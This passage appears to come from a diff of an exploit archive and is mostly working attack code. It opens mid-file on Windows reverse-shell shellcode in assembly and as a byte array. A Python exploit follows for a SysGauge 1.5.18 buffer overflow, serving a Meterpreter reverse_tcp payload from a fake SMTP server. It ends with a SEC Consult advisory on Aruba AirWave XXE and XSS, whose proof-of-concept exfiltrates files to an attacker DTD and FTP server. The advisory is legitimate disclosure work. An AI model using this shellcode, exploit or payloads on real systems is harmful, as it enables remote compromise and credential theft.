+ mov dl, 0x7f ;edx = 127.0.0.1 (hex)
+ push edx
+ push word 0x5c11; port 4444
+ push word 0x2
+
+ ;int connect(
+ ;_In_ SOCKET s,
+ ;_In_ const struct sockaddr *name,
+ ;_In_ int namelen
+ ;);
+
+ mov edx,esp
+ push byte 16 ; sizeof(sockaddr)
+ push edx ; (sockaddr*)
+ push edi ; socketReference
+
+ call [esi+20]
+
+
+ ;--------call recv()----------
+
+ ;int recv(
+ ;_In_ SOCKET s,
+ ;_Out_ char *buf,
+ ;_In_ int len,
+ ;_In_ int flags
+ ;);
+
+
+stage:
+ push eax
+ mov ax,950
+ push eax ;buffer length
+ push esp
+ pop ebp
+ sub ebp,eax ; set buffer to [esp-950]
+ push ebp ;&buf
+ push edi ;socketReference
+
+ call [esi+24]
+
+executeStage:
+ xor edx,edx
+ mov byte [ebp+eax-1],0xc3 ; end of the Alphanumeric buffer -> ret
+ mov byte [ebp+96],dl ; null terminator to ExitProcess
+ mov byte [ebp-1],0x5b ; buffer start: pop ebx -> return address
+ dec ebp
+ mov word [ebp+20],0x16ff ; call DWORD [esi]
+ mov word [ebp+35],0x0689 ; mov [esi],eax
+ mov word [ebp+110],0x16ff; call DWORD [esi]
+ mov word [ebp+120],0x0689; mov [esi],eax
+ mov ax,0x4173 ; As (CreateProcessA)
+ mov ecx,[esi+28] ; ecx = kernel32
+ dec dl ;edx = 0x000000ff
+ call ebp ; Execute Alphanumeric stage
+executeShell:
+ mov [ecx],dl ;null terminator to 'cmd.exe'
+ call dword [esi] ;createProcA
+ push eax
+ call dword [esi+4] ; ExitProccess
+
+
+
+ -----------------------
+
+unsigned char shellcode[]=
+"\x31\xc0\x50\x64\x8b\x40\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x58\x10\x8b\x4b\x3c\x01\xd9\x8b\x49\x78\x01\xd9\x8b\x71\x20\x01\xde\x31\xd2\x42\xad\x01\xd8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x8b\x71\x1c\x01\xde\x8b\x14\x96\x01\xda\x83\xec\x20\x54\x5e\x89\x14\x24\x89\x5e\x1c\x31\xff\x57\x68\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68\x4c\x6f\x61\x64\x54\x53\xff\x16\x31\xc9\x51\x66\xb9\x33\x32\x51\x68\x77\x73\x32\x5f\x54\xff\xd0\x89\xc5\x31\xc9\x51\x66\xb9\x75\x70\x51\x68\x74\x61\x72\x74\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x0c\x31\xc9\x51\x66\xb9\x74\x41\x51\x68\x6f\x63\x6b\x65\x68\x57\x53\x41\x53\x54\x55\xff\x16\x89\x46\x10\x57\xb9\x65\x65\x63\x74\xc1\xe9\x08\x51\x68\x63\x6f\x6e\x6e\x54\x55\xff\x16\x89\x46\x14\x57\x68\x72\x65\x63\x76\x54\x55\xff\x16\x89\x46\x18\x31\xc9\x66\x81\xec\xf4\x01\x54\x66\xb9\x02\x02\x51\xff\x56\x0c\x50\x50\x50\xb0\x06\x50\xb0\x01\x50\x40\x50\xff\x56\x10\x97\x6a\x01\x5a\xc1\xe2\x18\xb2\x7f\x52\x66\x68\x11\x5c\x66\x6a\x02\x89\xe2\x6a\x10\x52\x57\xff\x56\x14\x50\x66\xb8\xb6\x03\x50\x54\x5d\x29\xc5\x55\x57\xff\x56\x18\x31\xd2\xc6\x44\x05\xff\xc3\x88\x55\x60\xc6\x45\xff\x5b\x4d\x66\xc7\x45\x14\xff\x16\x66\xc7\x45\x23\x89\x06\x66\xc7\x45\x6e\xff\x16\x66\xc7\x45\x78\x89\x06\x66\xb8\x73\x41\x8b\x4e\x1c\xfe\xca\xff\xd5\x88\x11\xff\x16\x50\xff\x56\x04";
\ No newline at end of file
diff --git a/platforms/windows/remote/41479.py b/platforms/windows/remote/41479.py
new file mode 100755
index 000000000..c24f8fad3
--- /dev/null
+++ b/platforms/windows/remote/41479.py
@@ -0,0 +1,69 @@
+# Exploit Title: SysGauge 1.5.18 – buffer overflow in SMTP connection verification function leads to code execution
+# Date: 2017-02-28
+# Exploit Author: Peter Baris
+# Vendor Homepage: http://www.saptech-erp.com.au
+# Software Link: http://www.sysgauge.com/setups/sysgauge_setup_v1.5.18.exe
+# Version: 1.5.18
+# Tested on: Windows Server 2008 R2 Standard x64
+# CVE : requested
+
+# The shellcode has to be split into 2 pieces for the exploit to work and has to be placed at the offsets like shown below.
+# The 1st part can be max. 236 bytes
+# The 2nd part can be max. 76 (leave at least 4 NOPs)
+
+
+import socket
+
+# QtGui4.dll 0x6527635E - CALL ESP
+jmp = "\x5e\x63\x27\x65"
+nops = "\x90"*8
+
+
+# reverse meterpreter shell 306 bytes long bad chars \x00\x0a\x0b\x20
+#IP: 192.168.198.128, PORT: 4444
+# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
+
+rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
+"\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
+"\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
+"\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
+"\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
+"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
+"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
+"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
+"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
+"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
+"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
+"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
+"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
+"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
+"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
+"\xc1\x48\x45\x0e\x32\x6b\x4c")
+
+
+rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
+"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
+"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
+"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
+"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
+"\xe2\x79\xdc\x2d\x97\x97")
+
+
+buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
+port = 25
+s = socket.socket()
+ip = '0.0.0.0'
+s.bind((ip, port))
+s.listen(5)
+
+
+print 'Listening on SMTP port: '+str(port)
+print(len(rev_met_1))
+print(len(rev_met_2))
+
+while True:
+ conn, addr = s.accept()
+ conn.send('220 '+buffer+'ESMTP Sendmail \r\n')
+ conn.close()
+
+
diff --git a/platforms/xml/webapps/41482.txt b/platforms/xml/webapps/41482.txt
new file mode 100755
index 000000000..dc1f73c2f
--- /dev/null
+++ b/platforms/xml/webapps/41482.txt
@@ -0,0 +1,226 @@
+SEC Consult Vulnerability Lab Security Advisory < 20170301-0 >
+=======================================================================
+ title: XML External Entity Injection (XXE),
+ Reflected Cross Site Scripting
+ product: Aruba AirWave
+ vulnerable version: <=8.2.3
+ fixed version: 8.2.3.1
+ CVE number: CVE-2016-8526, CVE-2016-8527
+ impact: high
+ homepage: http://www.arubanetworks.com/
+ found: 2016-11-21
+ by: P. Morimoto (Office Bangkok)
+ SEC Consult Vulnerability Lab
+
+ An integrated part of SEC Consult
+ Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+ Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+ https://www.sec-consult.com
+=======================================================================
+
+Vendor description:
+-------------------
+"Aruba, a Hewlett Packard Enterprise company, (formerly "Aruba Networks, Inc.")
+is a networking vendor selling enterprise wireless LAN and edge access
+networking equipment. The company has over 1,800 employees and is
+headquartered in Sunnyvale, California. Aruba's core products are access points
+(APs), mobility controllers, and network management software through their
+Airwave Management Platform product."
+
+Source: https://en.wikipedia.org/wiki/Aruba_Networks
+
+
+Business recommendation:
+------------------------
+SEC Consult recommends not to use the product in a production environment
+until a thorough security review has been performed by security professionals
+and all identified issues have been resolved.
+
+
+Vulnerability overview/description:
+-----------------------------------
+1) XML External Entity Injection (CVE-2016-8526)
+The used XML parser is resolving external XML entities which allows attackers
+to read files and send requests to systems on the internal network (e.g port
+scanning).
+
+The vulnerability can be exploited by a low privileged read-only user
+to read sensitive information / files with malicious XML code.
+Note that as Aruba's passwords are encrypted with a shared static key,
+privilege escalation to admin role is also possible!
+
+Multiple different functions are affected by XXE.
+
+According to the vendor another researcher has also found one of the XXE issues, hence
+credits go to them as well.
+Vendor: "Although the team hasn't reproduced this yet, I’ve had other reports
+come in through our bug bounty program last month about XXE issues in VisualRF.
+One of the issues you reported is the same, and you reported three others that we
+haven't seen yet."
+
+
+2) Reflected Cross Site Scripting (CVE-2016-8527)
+Due to the lack of input validation, an attacker can insert malicious JavaScript
+code to be executed under a victim's browser context.
+
+
+Proof of concept:
+-----------------
+1) XML External Entity Injection (CVE-2016-8526)
+a) XXE in VisualRF Backup Sites
+
+Login as any user role (including read-only/standard user)
+Navigate to VisualRF > Floor Plans > Select 'View' under 'Network' section.
+Select a campus (e.g. Default Campus) > Select 'Edit' >
+Select action 'Export Floor Plans' > Ok
+
+POST /visualrf/backup_sites HTTP/1.1
+Host:
+[...]
+
+xml=:1234/sectest.dtd">%25%66%6f%6f%3b%25%70%61%72%61%6d%31%3b]>%26%65%78%66%69%6c%3b
+
+$ cat sectest.dtd
+">
+:2121/%data;'>">
+
+$ python -m SimpleHTTPServer 1234
+$ wget https://raw.githubusercontent.com/ONsec-Lab/scripts/master/xxe-ftp-server.rb
+$ ruby xxe-ftp-server.rb
+FTP. New client connected
+< USER anonymous
+< PASS Java1.8.0_102@
+> 230 more data please!
+< TYPE I
+> 230 more data please!
+< CWD [General]
+[...]
+< ; set global WLC credentials
+> 230 more data please!
+< wlc_user:
+> 230 more data please!
+< wlc_pasw:
+[...]
+
+b) XXE in Visual RF Site Restore
+$ cat version.xml
+
+ :1234/version.dtd">%foo;%param1;]>
+ &exfil;
+
+$ zip backup_sectest.zip version.xml
+ adding: version.xml (deflated 16%)
+
+And then just upload the backup_sectest.zip via the restore functionality.
+
+POST /nf/visualrf_siterestore HTTP/1.1
+Host:
+[...]
+
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
+Content-Disposition: form-data; name="zip"; filename="backup_sectest.zip"
+Content-Type: application/zip
+
+[.. backup_sectest.zip ..]
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A
+Content-Disposition: form-data; name="import"
+
+Import
+------WebKitFormBoundaryjPK7DdVbiNVDEJ2A--
+
+
+c) XXE in Visual RF Verify
+POST /visualrf/verify/ HTTP/1.1
+Host:
+[...]
+
+:1234/sectest.dtd">%foo;%param1;]>&exfil;
+
+
+2) Reflected Cross Site Scripting (CVE-2016-8527)
+Note that the XSS payload can be used with either HTTP parameter 'start' or 'end'.
+
+GET /visualrf/group_list.xml?aps=1&start=%3ca%20xmlns%3aa%3d'http%3a%2f%2fwww.w3.org%2f1999%2fxhtml'%3e%3ca%3abody%20onload%3d'alert(/XSS/)'%2f%3e%3c%2fa%3e&end=500&match HTTP/1.1
+Host:
+
+[...]
+HTTP/1.1 200 OK
+[...]
+
+
+
+ For input string: ""
+
+
+
+
+Vulnerable / tested versions:
+-----------------------------
+The following versions are affected by the identified vulnerabilities which
+were the most recent versions at the time of discovery:
+Aruba AirWave version <8.2.3.1
+
+
+Vendor contact timeline:
+------------------------
+2016-11-23: Contacting vendor through aruba-sirt@hpe.com
+2016-11-23: Vendor: Established communication over encrypted channel and asked
+ for extending the disclosure date due to the upcoming holidays
+2017-01-18: CVE-2016-8526 was assigned for the XXE issue, and CVE-2016-8527 for
+ the reflected XSS issue.
+2017-02-21: Aruba AirWave 8.2.3.1 was released.
+2017-03-01: Coordinated disclosure of the security advisory.
+
+
+Solution:
+---------
+Update to version 8.2.3.1 or later.
+
+http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2017-001.txt
+https://support.arubanetworks.com/Documentation/tabid/77/DMXModule/512/EntryId/23738/Default.aspx
+
+
+Workaround:
+-----------
+None
+
+
+Advisory URL:
+-------------
+https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm
+
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+SEC Consult Vulnerability Lab
+
+SEC Consult
+Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
+Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich
+
+About SEC Consult Vulnerability Lab
+The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
+ensures the continued knowledge gain of SEC Consult in the field of network
+and application security to stay ahead of the attacker. The SEC Consult
+Vulnerability Lab supports high-quality penetration testing and the evaluation
+of new offensive and defensive technologies for our customers. Hence our
+customers obtain the most current information about vulnerabilities and valid
+recommendation about the risk profile of new technologies.
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/Career.htm
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Pichaya Morimoto / @2017
\ No newline at end of file